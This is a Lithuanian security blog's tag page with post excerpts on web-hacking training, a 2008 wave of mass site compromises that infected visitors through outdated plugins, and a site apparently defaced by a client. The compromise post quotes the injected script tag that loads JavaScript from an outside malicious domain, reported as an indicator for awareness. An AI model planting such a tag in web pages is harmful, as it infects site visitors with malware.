Informacijos apsauga .LT » www
Gairė: www
Web hacking mokymai
2008-04-28 15:25 parašė Audrius
1 balas2 balai3 balai4 balai5 balai (Įvertinimai: 9. Vidutinis balas: 4.11 iš 5 galimų. Įvertink ir Tu.)
Loading ... Loading ...
» Skaityti komentarus: (17)

Šiemet organizuoju “WEB HACKING: įveikti internetą” mokymus. Kursui tuoj bus vieneri metai, bet visą tą laiką jis sėkmingai atnaujinamas. Savaitgalį į jį sudėjau ir paskutinio masinio nulaužimo analizę. Įdomiai ta visa ataka padaryta. Pirmą kartą mokymai truko 2 dienas, po to 3, dabar jau neaišku ar į 3 normaliai tilpti pavyks. Bet gal apie viską nuo pradžių.

Skaityti visą įrašą…

» Temos: Apie viską, Gerietis
» Žymėtis: kaip.tik.ten :: topix.lt :: del.icio.us

Įrašo gairės:

Užsikrėsti žalingomis programomis Jums padės… Susisiekimo ministerija
2008-04-25 00:09 parašė Audrius
1 balas2 balai3 balai4 balai5 balai (Įvertinimai: 8. Vidutinis balas: 4.88 iš 5 galimų. Įvertink ir Tu.)
Loading ... Loading ...
» Skaityti komentarus: (21)

Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus. :) Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.

image


Skaityti visą įrašą…

» Temos: Apie viską, Paieška, Programos
» Žymėtis: kaip.tik.ten :: topix.lt :: del.icio.us

Įrašo gairės:

Su klientais reikia elgtis gražiai, nes jie gali nulaužti Jūsų puslapį
2008-04-18 09:46 parašė Audrius
1 balas2 balai3 balai4 balai5 balai (Įvertinimai: 8. Vidutinis balas: 4.5 iš 5 galimų. Įvertink ir Tu.)
Loading ... Loading ...
» Skaityti komentarus: (19)

Daugiau informacijos adresu: http://www.rdv.lt/lt/apiemus

rdv_hack0

» Temos: Apie viską
» Žymėtis: kaip.tik.ten :: topix.lt :: del.icio.us

Įrašo gairės: